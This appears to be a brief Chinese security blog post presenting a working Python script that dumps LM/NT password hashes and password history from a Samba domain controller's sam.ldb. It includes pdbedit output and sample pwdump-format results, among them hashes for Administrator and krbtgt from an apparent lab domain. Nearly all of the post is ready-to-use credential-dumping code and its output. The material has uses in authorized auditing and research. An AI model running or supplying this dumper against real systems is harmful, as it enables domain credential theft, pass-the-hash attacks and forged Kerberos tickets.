
Samba DC Hash Dump

October 9, 2017 • Security

老文章，正好遇到，记录一下

获取Hash

root@samba:~# /usr/local/samba/bin/pdbedit -L -w
2K8DC$:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:CB14F1166BBE1749AC0FB40240C5DC30:[S          ]:LCT-530FC425:
Administrator:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:88E4D9FABAECF3DEC18DD80905521B29:[U          ]:LCT-531006A4:
krbtgt:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:F2EE6AB6F40810169E0E46B126CEFBEF:[DU         ]:LCT-530FC3FF:
nobody:65534:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:[U          ]:LCT-00000000:
jdoe:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:88E4D9FABAECF3DEC18DD80905521B29:[UX         ]:LCT-530FC5FF:
uber:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:88E4D9FABAECF3DEC18DD80905521B29:[UX         ]:LCT-53101261:

Python Script

  • samba-pwdump.py
#!/usr/bin/env python

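def get_history(attr, r):
    """Return the password-history values stored in ``r[attr]`` as hex strings.

    Args:
        attr: name of the history attribute to read (callers pass
            'lmPwdHistory' and 'ntPwdHistory').
        r: mapping-like record; only ``attr in r`` and ``r[attr][0]`` are
            used, so an ldb search result or a plain dict both work.

    Returns:
        A list of lower-case hex strings, one per 16-byte slice of the raw
        attribute value, in stored order. Empty list when ``attr`` is absent.
        A trailing slice shorter than 16 bytes is emitted as-is.
    """
    if attr not in r:
        return []
    hist = r[attr][0]
    # The value is one blob sliced in 16-byte steps. hexlify works on both
    # Python 2 str and Python 3 bytes; str.encode('hex') exists only on 2.
    return [binascii.hexlify(hist[i:i + 16]).decode('ascii')
            for i in range(0, len(hist), 16)]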


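def get_hash(attr, r):
    """Return the first value of ``r[attr]`` as a lower-case hex string.

    Args:
        attr: attribute name (callers pass 'dBCSPwd' for the LM field and
            'unicodePwd' for the NT field).
        r: mapping-like record; only ``attr in r`` and ``r[attr][0]`` are used.

    Returns:
        Hex string of the raw value, or '' when ``attr`` is absent so the
        colon-separated output line still has an (empty) field.
    """
    if attr not in r:
        return ''
    # hexlify works on Python 2 str and Python 3 bytes; str.encode('hex')
    # is Python 2 only and raises LookupError on 3.
    return binascii.hexlify(r[attr][0]).decode('ascii')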

import binascii
import sys
from sys import argv, exit

from ldb import Ldb
from samba.dcerpc import security
from samba.ndr import ndr_unpack

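if len(argv) not in (2, 3):
    # Usage text goes to stderr so that stdout carries only the hash lines
    # when the output is redirected to a file. stderr.write() keeps this
    # valid on both Python 2 and 3 (print(..., file=) needs a __future__
    # import on 2).
    sys.stderr.write('Usage: %s <path to .ldb> [-history]\n' % argv[0])
    sys.stderr.write(
        "Exmpl: %s '/var/lib/samba/private/sam.ldb.d/DC=SECURUS,DC=CORP,DC=COM.ldb'\n" % argv[0])
    exit(2)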

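for r in Ldb(argv[1]).search(expression='(objectclass=user)'):
    # objectSid is NDR-packed; dom_sid.split() is assumed to yield
    # (domain SID, RID) so the last element is the account RID — confirm
    # against the samba.dcerpc.security bindings in use.
    rid = ndr_unpack(security.dom_sid, r['objectSid'][0]).split()[-1]
    username = r['sAMAccountName']

    # Current values, one line per account: user:rid:lm:nt:::
    lmhash = get_hash('dBCSPwd', r)
    nthash = get_hash('unicodePwd', r)
    print('%s:%s:%s:%s:::' % (username, rid, lmhash, nthash))

    if len(argv) == 3 and argv[2] == '-history':
        # Entry 0 of each history is skipped; presumably it duplicates the
        # current value — verify against Samba's lmPwdHistory/ntPwdHistory
        # layout before relying on that.
        lm_old = get_history('lmPwdHistory', r)[1:]
        nt_old = get_history('ntPwdHistory', r)[1:]
        # Pad the shorter list explicitly. Python 2's two-iterable map()
        # padded with None, but Python 3's map() truncates to the shortest
        # iterable, which silently dropped every NT history entry for an
        # account with no LM history.
        for i in range(max(len(lm_old), len(nt_old))):
            lm_i = lm_old[i] if i < len(lm_old) else ''
            nt_i = nt_old[i] if i < len(nt_old) else ''
            print('%s_history%d:%s:%s:%s:::' % (username, i, rid, lm_i, nt_i))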

Example

root@samba:~# python samba-pwdump.py /usr/local/samba/private/sam.ldb.d/DC\=SITTINGDUCK\,DC\=INFO.ldb -history
SAMBACLONE$:1104:::::
2K8DC$:1000::cb14f1166bbe1749ac0fb40240c5dc30:::
Administrator:500::88e4d9fabaecf3dec18dd80905521b29:::
krbtgt:502::f2ee6ab6f40810169e0e46b126cefbef:::
Guest:501:::::
jdoe:1103::88e4d9fabaecf3dec18dd80905521b29:::
uber:1105::88e4d9fabaecf3dec18dd80905521b29:::
uber_history0:1105:444d1edcad01ae08f49f073e12e8cc14:88e4d9fabaecf3dec18dd80905521b29:::

如果不是默认路径，自行修改路径即可

References

Tags: hash, Samba